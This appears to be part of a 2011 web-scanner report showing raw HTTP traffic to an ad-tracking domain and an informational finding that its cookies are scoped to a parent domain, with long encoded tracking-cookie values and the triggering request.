Set-Cookie: rsi_segs_1000000=pUPF4jOhOHMMH/CFfyFZ5hBdG2vMqqLhSnJolGYsbyViGzm2jLwzYcdvSuDCX0BRE1faH6+pFVa+GWQXtDZTUlxD+4jxjaUOSiFWtaoRoWoEPzPFS/qMKOOgZxQVZZx2KCmQqCYRlyRJf87ly0DSxTUuHjFQ0X4Hi6hsBM3tptwhcQ6pKtiVzlPmT7J8YSmFCk8nGaEi8uw/pmdbUTDTCxPk3RxS+r7mTK51H+dbGZLb/kqnwYVwKVrKOpzc2O7wkmux+3qQQWO2J/PszzKC3ljESTz9399xzwtiFsZVYcKXVwxqFxDvGNQKXo0ptbR/IoxdSLmJBEm/k8mMZ4WHkJPjZT6fMEbI5g2M23AmaEQVktEetBJDbNPFWQ27V53NSmx+pbUr0pyI2ZBpEkHXsJYi7feTziLd3p9rHEXUDElkF/JDK4BDzYWVkKPFz6yF0rj48gBSTjhqU76TX+wY6WQDAsO771VDP2ZWQ68peAWlQwYgNRKVrDobMsl6Di7agpiSJECqh49MPhXgfUNp5lUgedG8SrI1FwY+H+428kgnXdAmQmN7meRbdFHLSVjzHBTtsWXT5/q0gECh/yWYSya2Cs2TIFbkGCETZtyyfEwg+tWpzb+0IRvhjWHw7U+DaYa4diIYnFw06AxKeXqq5os2iI7jC3Nwf1OV6egaBTwbrJMZV+YVqL6TCiQG/Ma7cvYoHyjMK/GORsYUSnGWb/7Qya7gaNIaWZhJB3LxWvWTaSypA8xdHhg+e92kAdckvfreKjwNhZ3lgBC+XuGOtuJj6dxjPWryrjN2phQuTcOO/r6vGfLN8Z67irPcUn4=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:38:29 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv39DMJZjprpr6vNwncqcAhdFtCsylMowYZxUW6MEqE8x+80+EqavgLMisVIcRzxwED7xvBKcptbVAK4xFQ4O9EOqJvQebjGkd2HvREU0eLo2l7yxWL/0MG7WVevK0RZx2HhKkOoO/XXE0cn0xNxLLlkMLrRCuXSNgvzgl00hTJygH5vsQF9AIe7nxcFEHzq7J/ryTDvo60kEZzCwnaQ0K70d/Z6I1egvMVrmMOud14+0L4jK9oliS4SVIfi71WWS8QsvOLa3LHEp84tDqtc0KZ44av7FUHoA3KYXKF4bQvZX91+OzSuIx7Q+J/QUhIRsYvfps2p/P6fS9etpeWLdX3rRKbUPuBZaZdj7skNQ15/D05elgQRnXEUzcQesr4WlTSulpp1g1S9A/ay9O64ZCeHlgo/svVsg3sSflpCjO0+VFkIgHH36fXHR/aZUE4HpuZ7n74F47alyR3ggNzAA0dPLqubl8Pn8TZMeLhYqQqbqmNUM4TohYzNF1DylgdgKvJuKxZjRR3qW4Gs/idOi7ARur7BPiVmF0JgNykm5IeTF+JRxN5G8nb6JAcLm/3MT6DMb2aLTWGlEHB9OkKhN07Vg2CZMZyV3yj8AorBW6bIfFUAQaz86cBNVGw/brB482dcIcOSlDYj3R32G+Ri28jIeWo/aR8B4xOXjdvf43/jW5cG5IH+hCJU5BQRHMzeeDdribF2+cARePUDtezFyfvdsc1iatfVpH/+cq/6Iul6LmWpPrzCvxlo9THyXVf5SG33hrt8XqL7ZnRMKBonqXmubW8M0ERWmtvGAQJNvz3lbipQCdUr6h2evlj27/0o48V+FAPidP+kH6h08/TkrLE/ur2N5yWnT1jtElH3zKztgH1EmbiGo24I/283980L9f8diGrjPBHRBgP9SI3NCxPMjl/GwfwC22/uVYjbYHKIWKTKFIYlMo+1SeLUK2bmWApwgMuJwRJ/m7douMd0hlDBrnCXNfB9cjD1t/uY+0qm6tIBRial6QVcIh8V2ciyzaolzSBlGDfS067/wO3x3dEOpUry6h5s6RphjURwfJ2bFA449MZKAomjZzrv3AsLF62qnG4qcCi0AFUP7eQzbEADdigA+t4OGhMSbnIyWoTEIvYXedCYhW8HTFUnonIR2Jv4s/RTiVTeQhADvv955scv/Jor+u4QOFIEt0gA+vRV1qqwJfXlFkY2do4ur8K07HLd2hjiWcu08/Tulsiemrs+lzG6UQZFwQfv7yQNALTotsmh8f7IqfQfMRJV6KZBLwB/MoqWhMGup467JVSqX3GjsA1VpYWFz+El0zXZiEyN+2ywpq3YGOP1cfNxWlj2M/wq/9ZSsTIyY76aftTwaM8IGrmlEgJQMTZtE2QMA7QrJ+JpqcGPH4kRyM1nDxUiq0iL2I3AO6O2dJ7PlPozN7AtzHIQE2+8Ekgy2718eMT9PcTfTb+40qzKGhfUGl0FMWGIUeXKwEF0RgFA7YyDrwe0I8muicTwKm2mlOa5Pnv2iWMkF9zjk//hL6AiqD1RYSlrusb2Imme66VfjuOoD8=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:38:29 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 11:38:29 GMT

GIF89a.............!.......,...........D..;

13.56. http://pix04.revsci.net/E05510/b3/0/3/1003161/38529734.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/E05510/b3/0/3/1003161/38529734.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4kmheQIMDjaxY4NY56qG7poa4ScLEaatLDiorNn5vw/ZUtic7CM+ql6+GQ3/2mfzBOt0uz4ioZbxdZ4yKQR6q2VPvFKPznRql5h8iOvwP/r7Uf9IwSmkFH0NoNDiWsOdoP7A+KE3858M0WhU+zdS/59inCiCUTWQLaizzQIR1Jh2FmjnSE2fdifYxO0hFnS9FxZXoM+ewAQ+WVQFcEZFaUeEkXZNT/PBQgjdRcK4WGBrlOv1DqmZz7xuATb8CytltZbgXJJY58xcZwnCXCHFuTkIHFW1FoL2aE3zRAgMg51YquKmovdXv+QV0fhRfnE6xPSyEMpC58Mxj+nWjf7oD6WG0lAcTegTtCOgCgI2k1pcgBbUwiV80ods8sxbygUz1dWn6ZUvSekSbxlwCdRn098aaj47CC7oVk9kO1pb0VM9cA3b665SB+OhF1zFHEkp/+QDgoNrBn8VKykiY+qLw/Bu+8Nctq5EdHrD86cthCAfjJ+JvhBtr+hvqcWrBDZZ+BOW2Zj+sZGvsnMIE70w1kK6+FcYdWh7pzpV71WufhmJZAsP9t0SA6EQrS3/mb6hBtyus6WizP/iq6oNZERiMkyG4bHD5g0lcaW8LBUqxKHj8/Tqt+nPtAzGxPA1sGQ5x1/GDy6rIH0dmflRdEw4eI+C4e8g5L+zpQkeNco1i6W1TmWS8ddUxVEYkFvTgqscQGR2CT4TqyQ5P7VYSokaeW2RJdMkFPRFl0wJFkVyVYTst5kLNlTOSewhb3OmW4N3Mne/l1d+HJACtoFxAji0GHuoTyUdi5TqQ6rYK5yqaf9YyGEF3AbHBA==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:38:26 GMT; Path=/
NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b0b2&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:38:26 GMT; Path=/
rtc_Pt3a=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:38:26 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/38529734.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F03%252Fforstmann-is-said-to-be-undergoing-treatment-for-brain-cancer%252F%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4j+huXIMH/C1v6FY5BBdG2vMpqLhSnJol2IUPsJbus0+tNf443NrkvBlDss6IgvcvW8ova5kI2P/V/BVw0aNn868fOK8Dy9xw0TAYvHMczr3EMFgbbmElzdU7GJvXSYySD/k0bGgHELUgeDilqQHpnA9s7sER/+8h/9nNrzaqqNb3AP9/i0SnbfLq6Dh6gyBCP0WLYL6hey/UVhvuDpzOPhEl1ZjpmIAMelrzbhkDOPjPb1FAUDBerYVnJKdlUPnq5antNg27LdOwBZioN4tryEpXXE6LodPEmSm6JMLFmNCCY/wCiUJRPPGNTDulRfKsqeNgeJTAMCoT3h/FlsZznMVEQI1dGv6oVfTkn0VRez+QymRzJDhmafb6GXgJF1s5xfICdCOJCxm/fz+8R7ly9rR/dBwF2CuXBmEaXk17vx4z5MMKbzgZxIF3xUfSuBccyNcgujeroPdkDFz0f61qLXq6O+oKZXIvhdT2oCSDrJ+gmqEkPLttN/0AhjMxFTPmReLtyNWAgA+RQyeIAGDRsIqFtkLnGMtMex7P4cX3cbgmlEXYHCGQM6rWWH9n/6RL/jKyvJ5k1mbEY7fRuqH7ma8T1fjn0ZqkoNt3kGNm86MlKPuyiq7tUVtcyMdFznE89p8gUd6/wtm0YlGNfnRRTLLcY0x6OegmaCs7O8Aj+83dsPI5DsNM/QYWiETRnzZ02iTBb42RQ6o58sjr1X9YlirA2E+PaWF5Cj9Y55OPU0MV7XLzFGmJCdBRIrZFfXxPH8hZ3qvwVZX7qE43bBiIPGQhETp8Jj3HhZM0bKIe+WZWGf6SXhHCc4=; rtc_6SVK=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; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_hjCW="MLsXrrEOpxpv55C28tahZ2a57v4BlBm9Y8OavLvXmNxWyY+bhP0TqX40neBrVzd0wSQq0FGvdh22EpPGBgiyPKLxJghVv1hoPbkGAV5luxQek5y8BQn+B9prQUM2WJZ5fTuL82yjqodMrmoMgdbgq/o91bP5Zj9EonQ6upsfRO+jY8DisQTjxJrmuuMKFZcPeOthmZA7m+lgo79tGXA7Rpfs7ep2p7s6ZNC+KizgnoD9KrASxX20oY+kbUvby3W0iS8IC5Aru+mtGUpz2IybKzLWwl4a4Djh00WFi3FhnmUDRIETGzJoTKtyfV2nlSGlGDHU8j4m5WErIZUpF4uuZlOkb3gdnGNZouDhXMC1POnlZhPPKkpUtUqMzIFEZBoaiXt+39EhtOmsDCGSz+9rsM6na1pcn7bsmoEkrOynDWTPKWp3nDx8JfKBrgiTq9LaoOzpF2vpLx51hKuWVC3n7NhjkIyeI21jfODuKpsTZJ0qAGbd0tFPhbP+8+m5r8ZjkLN/cd9ZMjaEsyNGh4OfzkQHC04p0FAq2PCeCdjhE3IFZamnakGUUBDvbQqSqQghGzjeoJsW5qB3XzNq++ypbPIbO3uWtPXT8ugDY3NyW1JttQESSXiL2DEutbvUX21Bju9qCYoEfAcPlC2hH0ZZbYq0oeBiAsCJDkEEjWtlDZHERo/yntbo2PWyLQuacypOsyV9laoVq2mJ790KEgMe3HRwdKMA0ZNM12noQNImq57cD5AZwSLgiCvAtQ9omybm4HIVDAihrsez+I1pmanlBIMrWfSUEx22hc0VxqR7mjaj+aEQOnRwrNSkwhfLQxmPkW95P5+4Nvwj41pYhLhPYRr2DGJ6/AmiwJQj2OGn4qJIDqnXSDoO2CrozkuBdkqGZVAq2Ko6zHLUeqPDRM/Zm/ctKZTPLzXX0sOEuNdP3v/+dajCHbCylk3nlEkyfxSeejEGf1pcXieFuSeKRRsj3gQIV5MjDPvmKqGTSRtNo82LO+Dhiz+w7Q/7z/wy0jMMpRA4qivdxIxStpdLNz/tn0mdVOTQinO/cx8QjhX3ydihLInu0vJh1Sq0YAiAinb33t93pTUWeRMuK4OK+bFMJc4W4Y3N6FftW3j9DhDz0bU+x6M8/+VSmEH3i8u9leHJodTvE7Nu62BTO91449QtmzOAfcfJpCK2PnyRDE1FOlr5glA/iR6lyV4/airi4/Q46MpXflCf5B/vCDqtq5psRiF5+EjXePj3bgUlknH1S5dfeXgU5cGv+cBlQlfjuYPGjIC3w0cU/FbT7Hgk8jOOixkNkbjj06y/JBcT7gbUjp5fl67fbZKtgiKjm6norre/kL+37vzIV0QTaDfciblKDMDM+EFsR6FNUS8OygTKqAgqg59K7Fut6g=="; rsi_us_1000000="pUMV4y9DPxYULWF0thvOWWVe/X6q9GYPHpB2doamCKZ0HdQ/HXWkpRH/Ms/F0FIWwpOftESMlGYf1bDSl/ir52l4cGsjAFHl29ihtu92QnSPhbmRPk79IDMxLMzW4QIoFcRSTZXsq3PtyxCXCVLXsRUo31TNf16uqZJANoqJp1NYh3efhp8q6dteu4a3S7Thi9lnaGV9RObaakVO3CDjaOpNTdqivOYUKZSThz7WMa92oA4w8XJNLb0JXM2832nLwiFB9SYYVZnu3z/cwepIuGXdqDeB98nNNl0eMqYPWVrNhTPutwqKJmiWOqb1mWoSX4V71LUYefyU8Zss1u6mhlIwYyAvf/RKoLLZwVVp0d1JBLfyr/tZkhZU3Iy/8F++PCDZF/sbmOQjK4hwVvka0FRyVDPJv4H+YyqzNrWHGLp0n8mXd5bXtGf1Tff6WOlsthHq703CC0v7B1mEjbUKV1Q7GB+D59gTVmu0fEM/ck785HsUOmnJxmDknMw/+M7ANXuRCP8sbpAJj21XP7AbB/EGWSUTayGKzrnkQFIczaswmW1yaMhAKFpqKxoZzowD4+BsdEQAUx9WjZOzamASxwpAD9X90KNReCc+K8LCTe1Igr6hl65+w4Ckavj2vCqoLyXW/GYi6UZlBr1ZvMQ1g3WnVqskvsjmEHlmDfWUEdeRjfQ3L5ZD6+OjUAgKohgkzsjtVodoMl1RAzuLEjm276e8WYmO52Amuvlok1z6mFXHyP/kTBJBtJDoqukJPg6ccxcR1RhvSxUKsc8AOgxTDyIGgSdz6ouhQvyEeR9HbQ39Epxo9IpGGDPyMQbHBPwX1MNEszdJCLGMq6NJlZCEtMJZUwyx5ZpDA/+8gml7VTMOz1UGxuAP0mGAFTZoKaCuCAUAFfZz8mNl6ueymUFqob6Os3X2kYvyrdeQwI7ozrlXYoO4thHbiNDS3xkLH1Ta+1mU0fyTq3bzznAhgDSIBImy836OzEGaR1WATENi8R/YNg1tdmyJCDDm+y1XxYT041dWsT5TRyGsVAbcMU0OKLUVP2fLbek7cLbxvDcm1s9dJvF0p1WQMe5HsgHP9fzmxXgy7J9rUjs2B9BQLw/5KokV5guHMwLSCKGnQ4+CtdfZND4pmD5f0q/8MBmg1nrNPF9NqpPzj0+n/4EZY0qIKzuenFBaNxUYpYVa21wtYWTZWzg8NXMIHPNy8fSPKuVv6RS3te+QR8z97XEke7Me5V2KjTohCiWh5t0irkX9AhmpR++Z7Jj9yqkMaGQ3zFRj9/rX0jZR/huUn36hc8DnfS3bH3vzxluRwOli8kQUbvA8FFZaEAy0lbJfr3n1Up9np1DOkfpSAskN5QwKzHO3SAKXP+tEA/xhQswseY0gAFfQOl/f6B76CsnKQ2iceRfMiUmjdAs3Txuj2eJqhj1YDClnoICqG76WAN5H8SjPlxP9FSbcgQ0YcgGQ4Ry+MRZdC2p3snp34is5jHgK0ZCL4UW9UMBDqYJe5C8i3UN+aybtDgGqKYecTKyqybG+msluma4IkDrK9eM/QY86EgogFLdSsg1PgukD5Y5nde6LIxiKYKFFMRDDGUrqXJHn3FLUr09d7toCcxRFFgWTg+M5PlqGM5gPf1Lm71Io6+hyeU7HVRZCt4tN2SeS12q5UQe50Vjv63jtBqtdaO/NA7Xz99YVzQZnOBqU75i/SmMRUxGTtkdQgb1nBAvHbgLdaLAd3SrjWMD1vLQef28zwIxfm1mZNRjpKKidykEE0MnkCjWFzYK36RK5wFrniu8YsuA4ch47I7lFxquMuZGPg3dU4BR7dJw="; 